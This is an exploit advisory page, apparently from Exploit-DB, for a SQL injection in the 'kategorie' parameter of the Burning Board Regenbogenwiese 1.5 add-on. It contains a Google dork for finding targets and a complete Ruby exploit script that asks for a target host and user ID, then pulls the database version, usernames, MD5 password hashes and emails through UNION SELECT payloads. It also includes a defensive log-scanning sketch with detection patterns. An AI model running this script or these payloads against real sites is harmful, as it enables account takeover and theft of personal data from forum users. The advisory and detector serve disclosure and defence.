Vendor: Burning Board Regenbogenwiese 2007 Addon
By: Easy Laster
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Burning Board Regenbogenwiese 2007 Addon
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: NO
Related CWE: N/A
CPE: a:woltlab:burning_board_regenbogenwiese_2007_addon:1.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 8/Backtrack
2013

Woltlab Burning Board Regenbogenwiese 2007 Addon SQL Injection Exploit

This exploit allows an attacker to inject malicious SQL code into the vulnerable Woltlab Burning Board Regenbogenwiese 2007 Addon. The vulnerability exists in the ‘regenbogenwiese.php’ file, where the ‘kategorie’ parameter is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL code. This code will be executed in the backend database, allowing the attacker to gain access to sensitive information such as usernames, passwords, emails, etc.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries.
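
With no patch available, the validation described above can also be applied outside the add-on, in access-log review or a filtering proxy. The following Ruby sketch is an added example, not part of the original advisory or the add-on's code: it checks the 'kategorie' value of requests to regenbogenwiese.php against an allowlist. The allowlist pattern, the function names and the log lines are assumptions constructed for illustration.

```ruby
require 'uri'
# Assumption: legitimate category values are short alphanumeric tokens.
ALLOWED_KATEGORIE = /\A[A-Za-z0-9_-]{1,32}\z/
SQL_MARKERS = {
  'quote'   => /['"]/,
  'union'   => /\bunion\b.*\bselect\b/im,
  'comment' => /--|\#|\/\*/
}.freeze
REQUEST = /\A(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/

# Constructed sample log lines (documentation IP ranges, made-up values).
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [04/Sep/2013:10:00:01 +0200] "GET /wbb/regenbogenwiese.php?kategorie=hunde HTTP/1.1" 200 5120
  203.0.113.9 - - [04/Sep/2013:10:00:07 +0200] "GET /wbb/regenbogenwiese.php?kategorie=%27+union+select+1,1+from+bb1_users--+ HTTP/1.1" 200 7344
  203.0.113.9 - - [04/Sep/2013:10:00:09 +0200] "GET /wbb/index.php?page=1 HTTP/1.1" 200 900
  198.51.100.23 - - [04/Sep/2013:10:02:30 +0200] "GET /regenbogenwiese.php?kategorie=1%2527%2520UnIoN%2520SeLeCt HTTP/1.1" 200 4100
LOG

# Decode repeatedly so double-encoded values (%2527) cannot hide from the checks.
def fully_decode(value, rounds = 3)
  rounds.times do
    decoded = URI.decode_www_form_component(value)
    break if decoded == value
    value = decoded
  end
  value
end

# Returns [decoded_value, reasons] for a rejected kategorie value, else nil.
def classify(query)
  raw = URI.decode_www_form(query).assoc('kategorie')&.last
  return nil if raw.nil?
  value = fully_decode(raw)
  return nil if value.match?(ALLOWED_KATEGORIE)
  reasons = SQL_MARKERS.select { |_, re| value.match?(re) }.keys
  [value, reasons.empty? ? ['not-allowlisted'] : reasons]
rescue ArgumentError # invalid %-encoding left over after decoding
  [query, ['malformed-encoding']]
end

# Scans access-log text and returns one hash per rejected request.
def suspicious_requests(log_text)
  log_text.each_line.filter_map do |line|
    ip, target = line.match(REQUEST)&.captures
    path, query = target.to_s.split('?', 2)
    next unless query && path.downcase.end_with?('/regenbogenwiese.php')
    value, reasons = classify(query)
    { ip: ip, value: value, reasons: reasons } if value
  end
end
```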

Exploit-DB raw data:

# Exploit Title: Woltlab Burning Board Regenbogenwiese 2007 Addon SQL Injection Exploit
# Google Dork: inurl:regenbogenwiese.php wbb (and more)
# Date: 04.09.2013
# Exploit Author: Easy Laster
# Software Name: Regenbogenwiese v1.5 © 2007 by DieKrabbe
# Version: 1.5
# Tested on: Windows 8/Backtrack
#

#!/usr/bin/ruby
#secunet.cc
#30.07.2013
#regenbogenwiese.php?kategorie='+union+select
#+1,1,1,1,1,1,concat(database(),0x3a,user(),0x
#3a,userid,0x3a,password,0x3a,username,0x3a,em
#ail),1,1,1,1,1,1,1,1+bb1_users+where+userid=1--+
#Discovered and Vulnerability by Easy Laster
print "
################################################################
#                            secunet.cc                        #
################################################################
#PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
#Woltlab Burning Board Regenbogenwiese 2007 Addon SQL Injection#
#             (regenbogenwiese.php, kategorie param)           #
#                          Exploit                             #
#                     Using Host+Path+id                       #
#              www.demo.de + /wbb/ + or + / + 1                #
#                         Easy Laster                          #
#PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
################################################################
"
require 'net/http'
block = "################################################################"
print ""+ block +""
print "\nEnter Target Name (site.com)->"
host=gets.chomp
print ""+ block +""
print "\nEnter Script Path (/wbb/ or /)->"
path=gets.chomp
print ""+ block +""
print "\nEnter The ID From User (id)->"
userid=gets.chomp
print ""+ block +""
begin
dir =  "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat(0x27,0x7e,"+
       "0x27,version(),0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+where+userid="+
       ""+ userid +"--+"
       http = Net::HTTP.new(host, 80)
       resp= http.get(path+dir)
       print "\nVersion Database -> "+(/'~'(.+)'~'/).match(resp.body)[1]

          dir =  "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,conc"+
          "at(0x27,0x7e,0x27,user(),0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users"+
          "+where+userid="+ userid +"--+"
          http = Net::HTTP.new(host, 80)
          resp= http.get(path+dir)
          print "\nDatabase User  -> "+(/'~'(.+)'~'/).match(resp.body)[1]

             dir =  "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+
             "(0x27,0x7e,0x27,userid,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+wh"+
             "ere+userid="+ userid +"--+"
             http = Net::HTTP.new(host, 80)
             resp= http.get(path+dir)
             print "\nID Account  -> "+(/'~'(.+)'~'/).match(resp.body)[1]

         dir =  "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+
         "(0x27,0x7e,0x27,username,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+w"+
         "here+userid="+ userid +"--+"
         http = Net::HTTP.new(host, 80)
         resp= http.get(path+dir)
         print "\nUsername Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]

      dir =  "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+
      "(0x27,0x7e,0x27,password,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+w"+
      "here+userid="+ userid +"--+"
      http = Net::HTTP.new(host, 80)
      resp= http.get(path+dir)
      print "\nPassword Account MD5 -> "+(/'~'(.+)'~'/).match(resp.body)[1]

   dir =  "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,conc"+
   "at(0x27,0x7e,0x27,email,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+"+
   "where+userid="+ userid +"--+"
   http = Net::HTTP.new(host, 80)
   resp= http.get(path+dir)
   print "\nEmail Adresse Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]
    print "\n"     
  print ""+ block +""
   print "\n"
 print "
################################################################
#                            Greetings                         #
################################################################
-#------------------------+     | |      #---------------------+        
-#------------------------+    _|_|_     #---------------------+  
-#------------------------+    (o o)     #---------------------+
-#------------------------+ooO--(_)--Ooo-#---------------------+
################################################################
   "
   rescue
  print "\nExploit Failed"
end